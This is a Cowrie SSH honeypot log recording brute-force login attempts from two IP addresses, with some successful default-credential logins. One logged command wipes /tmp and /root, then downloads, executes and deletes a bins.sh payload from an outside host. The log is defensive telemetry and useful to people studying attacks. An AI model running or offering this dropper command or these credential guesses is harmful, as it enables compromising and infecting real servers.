{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:47.700475Z","src_ip":"212.227.125.160","session":"2e407e620a41"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:36:47.701891Z","src_ip":"212.227.125.160","session":"2e407e620a41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:36:47.780498Z","src_ip":"212.227.125.160","session":"45d207910ecb"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T11:36:47.781202Z","src_ip":"212.227.125.160","session":"45d207910ecb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:48.388208Z","src_ip":"212.227.125.160","session":"45d207910ecb"}
{"eventid":"cowrie.session.closed","duration":"207.8","message":"Connection lost after 207.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:48.389556Z","src_ip":"212.227.125.160","session":"45d207910ecb"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:36:48.699876Z","src_ip":"212.227.125.160","session":"2e407e620a41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54740,"dst_ip":"1.2.3.4","dst_port":22,"session":"12a48d1bf240","protocol":"ssh","message":"New connection: 212.227.125.160:54740 (1.2.3.4:22) [session: 12a48d1bf240]","sensor":"my-vps","timestamp":"2025-08-26T11:36:48.919041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:48.929962Z","src_ip":"212.227.125.160","session":"12a48d1bf240"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:36:49.041076Z","src_ip":"212.227.125.160","session":"2e407e620a41"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-26T11:36:49.041832Z","src_ip":"212.227.125.160","session":"2e407e620a41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:49.045140Z","src_ip":"212.227.125.160","session":"12a48d1bf240"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":139,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:49.096808Z","src_ip":"212.227.125.160","session":"2e407e620a41"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:49.140283Z","src_ip":"212.227.125.160","session":"2e407e620a41"}
{"eventid":"cowrie.login.failed","username":"vmail","password":"vmail","message":"login attempt [vmail/vmail] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:49.208627Z","src_ip":"212.227.125.160","session":"12a48d1bf240"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:50.453680Z","src_ip":"212.227.125.160","session":"12a48d1bf240"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55508,"dst_ip":"1.2.3.4","dst_port":22,"session":"d16aa4ac78a6","protocol":"ssh","message":"New connection: 212.227.125.160:55508 (1.2.3.4:22) [session: d16aa4ac78a6]","sensor":"my-vps","timestamp":"2025-08-26T11:36:54.723811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:54.726336Z","src_ip":"212.227.125.160","session":"d16aa4ac78a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:54.788182Z","src_ip":"212.227.125.160","session":"d16aa4ac78a6"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:54.979211Z","src_ip":"212.227.125.160","session":"d16aa4ac78a6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:56.055236Z","src_ip":"212.227.125.160","session":"d16aa4ac78a6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":32918,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e23bc1d3535","protocol":"ssh","message":"New connection: 83.168.105.65:32918 (1.2.3.4:22) [session: 3e23bc1d3535]","sensor":"my-vps","timestamp":"2025-08-26T11:36:59.823370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:59.824394Z","src_ip":"83.168.105.65","session":"3e23bc1d3535"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:59.859645Z","src_ip":"83.168.105.65","session":"3e23bc1d3535"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56274,"dst_ip":"1.2.3.4","dst_port":22,"session":"a04fc5e2d33d","protocol":"ssh","message":"New connection: 212.227.125.160:56274 (1.2.3.4:22) [session: a04fc5e2d33d]","sensor":"my-vps","timestamp":"2025-08-26T11:36:59.962578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:59.964806Z","src_ip":"212.227.125.160","session":"a04fc5e2d33d"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:37:00.003954Z","src_ip":"83.168.105.65","session":"3e23bc1d3535"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:00.015110Z","src_ip":"212.227.125.160","session":"a04fc5e2d33d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:37:00.142089Z","src_ip":"83.168.105.65","session":"3e23bc1d3535"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:37:00.142888Z","src_ip":"83.168.105.65","session":"3e23bc1d3535"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:00.180114Z","src_ip":"83.168.105.65","session":"3e23bc1d3535"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:00.181385Z","src_ip":"83.168.105.65","session":"3e23bc1d3535"}
{"eventid":"cowrie.login.failed","username":"user5","password":"user5","message":"login attempt [user5/user5] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:00.193768Z","src_ip":"212.227.125.160","session":"a04fc5e2d33d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:01.247466Z","src_ip":"212.227.125.160","session":"a04fc5e2d33d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57050,"dst_ip":"1.2.3.4","dst_port":22,"session":"17df75a164fd","protocol":"ssh","message":"New connection: 212.227.125.160:57050 (1.2.3.4:22) [session: 17df75a164fd]","sensor":"my-vps","timestamp":"2025-08-26T11:37:05.793568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:05.794499Z","src_ip":"212.227.125.160","session":"17df75a164fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:05.860282Z","src_ip":"212.227.125.160","session":"17df75a164fd"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:06.014525Z","src_ip":"212.227.125.160","session":"17df75a164fd"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:07.148735Z","src_ip":"212.227.125.160","session":"17df75a164fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57824,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3ee40371d2b","protocol":"ssh","message":"New connection: 212.227.125.160:57824 (1.2.3.4:22) [session: b3ee40371d2b]","sensor":"my-vps","timestamp":"2025-08-26T11:37:11.685185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:11.689621Z","src_ip":"212.227.125.160","session":"b3ee40371d2b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:11.755147Z","src_ip":"212.227.125.160","session":"b3ee40371d2b"}
{"eventid":"cowrie.login.failed","username":"odoo15","password":"odoo15","message":"login attempt [odoo15/odoo15] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:11.992318Z","src_ip":"212.227.125.160","session":"b3ee40371d2b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:13.044451Z","src_ip":"212.227.125.160","session":"b3ee40371d2b"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":37426,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb9ec54fdbc5","protocol":"ssh","message":"New connection: 83.168.105.65:37426 (1.2.3.4:22) [session: bb9ec54fdbc5]","sensor":"my-vps","timestamp":"2025-08-26T11:37:15.239058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:15.240313Z","src_ip":"83.168.105.65","session":"bb9ec54fdbc5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:15.275474Z","src_ip":"83.168.105.65","session":"bb9ec54fdbc5"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:15.419461Z","src_ip":"83.168.105.65","session":"bb9ec54fdbc5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:16.458452Z","src_ip":"83.168.105.65","session":"bb9ec54fdbc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58594,"dst_ip":"1.2.3.4","dst_port":22,"session":"9975115010c3","protocol":"ssh","message":"New connection: 212.227.125.160:58594 (1.2.3.4:22) [session: 9975115010c3]","sensor":"my-vps","timestamp":"2025-08-26T11:37:17.494133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:17.495027Z","src_ip":"212.227.125.160","session":"9975115010c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:17.548068Z","src_ip":"212.227.125.160","session":"9975115010c3"}
